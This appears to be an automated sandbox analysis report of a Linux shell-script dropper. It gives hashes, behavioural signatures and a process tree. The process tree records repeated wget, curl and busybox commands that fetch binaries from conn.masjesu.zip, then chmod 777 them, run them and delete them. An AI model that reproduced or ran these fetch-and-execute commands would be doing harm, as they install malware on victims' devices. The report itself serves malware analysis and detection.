Analysis
-
max time kernel
128s -
max time network
129s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
25/10/2024, 01:05
Static task
static1
Behavioral task
behavioral1
Sample
08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh
-
Size
10KB
-
MD5
7632ec045de4b1033e7c4b16bc1ca67d
-
SHA1
761dbef5f61fe1d3fd78c27236662b075cc559ad
-
SHA256
08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e
-
SHA512
971fe55854409ae07deaca1bbdc26c698a414d163ad3eb5a9246d2da6216c552c294dde58c1df5d8d3d97c1e0323bb04a11b00cc5e8803588ba70f04f9dff75c
-
SSDEEP
192:UtRl0RBbqnWB0c7yWvxCptcUkXOIYqS7Ik4oIqS7IkuptcUkXO0c7yW1Rl0RBb44:UqInWB0c7yWvxCptcUkXOInozptcUkXD
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 836 chmod 867 chmod 965 chmod 972 chmod 986 chmod 1000 chmod 874 chmod 930 chmod 937 chmod 951 chmod 749 chmod 881 chmod 902 chmod 909 chmod 958 chmod 888 chmod 895 chmod 944 chmod 1007 chmod 739 chmod 843 chmod 853 chmod 860 chmod 923 chmod 979 chmod 795 chmod 916 chmod 993 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh 740 G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh /tmp/S82B3midttp7tynH1d7SXU5VngkmPvSAys 750 S82B3midttp7tynH1d7SXU5VngkmPvSAys /tmp/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB 797 9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB /tmp/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b5 837 YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b5 /tmp/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV30 844 DF5OLHFToOpmRK3joDLpz0Y46NFECXaV30 /tmp/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX 854 gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX /tmp/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl 861 AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl /tmp/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj 868 Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj /tmp/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI 875 QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI /tmp/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx 882 u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx /tmp/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif6 889 DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif6 /tmp/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq0 896 9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq0 /tmp/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX 903 0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX /tmp/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet 910 8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet /tmp/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl 917 AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl /tmp/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX 924 gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX /tmp/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif6 931 DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif6 /tmp/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj 938 Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj /tmp/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI 945 QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI /tmp/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx 952 u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx /tmp/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet 959 8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet /tmp/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq0 966 9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq0 /tmp/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX 973 0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX /tmp/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV30 980 DF5OLHFToOpmRK3joDLpz0Y46NFECXaV30 /tmp/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh 987 G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh /tmp/S82B3midttp7tynH1d7SXU5VngkmPvSAys 994 S82B3midttp7tynH1d7SXU5VngkmPvSAys /tmp/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB 1001 9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB /tmp/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b5 1008 YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b5 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 999 busybox 887 busybox 863 wget 873 busybox 927 curl 955 curl 968 wget 989 wget 744 curl 885 curl 971 busybox 856 wget 913 curl 943 busybox 901 busybox 926 wget 936 busybox 1004 curl 899 curl 922 busybox 746 busybox 803 curl 847 curl 857 curl 866 busybox 905 wget 929 busybox 948 curl 730 curl 982 wget 983 curl 957 busybox 871 curl 908 busybox 1006 busybox 736 busybox 934 curl 941 curl 947 wget 985 busybox 878 curl 870 wget 933 wget 1003 wget 756 wget 852 busybox 877 wget 884 wget 898 wget 906 curl 920 curl 940 wget 805 busybox 990 curl 992 busybox 969 curl 859 busybox 912 wget 742 wget 765 curl 773 busybox 880 busybox 954 wget 713 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI curl File opened for modification /tmp/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq0 curl File opened for modification /tmp/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX curl File opened for modification /tmp/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh curl File opened for modification /tmp/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif6 curl File opened for modification /tmp/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx curl File opened for modification /tmp/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV30 curl File opened for modification /tmp/S82B3midttp7tynH1d7SXU5VngkmPvSAys curl File opened for modification /tmp/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX curl File opened for modification /tmp/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx curl File opened for modification /tmp/S82B3midttp7tynH1d7SXU5VngkmPvSAys curl File opened for modification /tmp/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh curl File opened for modification /tmp/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV30 curl File opened for modification /tmp/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB curl File opened for modification /tmp/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet curl File opened for modification /tmp/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl curl File opened for modification /tmp/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX curl File opened for modification /tmp/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj curl File opened for modification /tmp/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq0 curl File opened for modification /tmp/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b5 curl File opened for modification /tmp/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b5 curl File opened for modification /tmp/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif6 curl File opened for modification /tmp/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB curl File opened for modification /tmp/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI curl File opened for modification /tmp/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet curl File opened for modification /tmp/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX curl File opened for modification /tmp/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl curl File opened for modification /tmp/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj curl
Processes
-
/tmp/08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh/tmp/08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh1⤵PID:708
-
/bin/rm/bin/rm bins.sh2⤵PID:710
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- System Network Configuration Discovery
PID:713
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- System Network Configuration Discovery
PID:736
-
-
/bin/chmodchmod 777 G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh./G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵PID:741
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- System Network Configuration Discovery
PID:742
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- System Network Configuration Discovery
PID:746
-
-
/bin/chmodchmod 777 S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/S82B3midttp7tynH1d7SXU5VngkmPvSAys./S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵PID:754
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- System Network Configuration Discovery
PID:756
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- System Network Configuration Discovery
PID:773
-
-
/bin/chmodchmod 777 9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB./9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm 9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵PID:800
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵PID:801
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- System Network Configuration Discovery
PID:805
-
-
/bin/chmodchmod 777 YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b5./YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- Executes dropped EXE
PID:837
-
-
/bin/rmrm YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵PID:838
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵PID:839
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵
- Reads runtime system information
- Writes file to tmp directory
PID:840
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵PID:842
-
-
/bin/chmodchmod 777 DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV30./DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵PID:845
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵PID:846
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- System Network Configuration Discovery
PID:852
-
-
/bin/chmodchmod 777 gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX./gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵PID:855
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- System Network Configuration Discovery
PID:856
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- System Network Configuration Discovery
PID:859
-
-
/bin/chmodchmod 777 AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl./AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- System Network Configuration Discovery
PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- System Network Configuration Discovery
PID:866
-
-
/bin/chmodchmod 777 Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj./Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- System Network Configuration Discovery
PID:870
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- System Network Configuration Discovery
PID:873
-
-
/bin/chmodchmod 777 QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI./QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- System Network Configuration Discovery
PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- System Network Configuration Discovery
PID:880
-
-
/bin/chmodchmod 777 u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx./u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- System Network Configuration Discovery
PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- System Network Configuration Discovery
PID:887
-
-
/bin/chmodchmod 777 DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif6./DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵PID:890
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵PID:891
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵PID:894
-
-
/bin/chmodchmod 777 9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq0./9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm 9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵PID:897
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- System Network Configuration Discovery
PID:898
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- System Network Configuration Discovery
PID:901
-
-
/bin/chmodchmod 777 0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX./0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm 0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵PID:904
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- System Network Configuration Discovery
PID:905
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- System Network Configuration Discovery
PID:908
-
-
/bin/chmodchmod 777 8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet./8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm 8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵PID:911
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- System Network Configuration Discovery
PID:912
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵PID:915
-
-
/bin/chmodchmod 777 AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl./AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵PID:918
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵PID:919
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- System Network Configuration Discovery
PID:922
-
-
/bin/chmodchmod 777 gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX./gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- System Network Configuration Discovery
PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- System Network Configuration Discovery
PID:929
-
-
/bin/chmodchmod 777 DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif6./DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵PID:932
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- System Network Configuration Discovery
PID:933
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- System Network Configuration Discovery
PID:936
-
-
/bin/chmodchmod 777 Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj./Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵PID:939
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- System Network Configuration Discovery
PID:940
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- System Network Configuration Discovery
PID:943
-
-
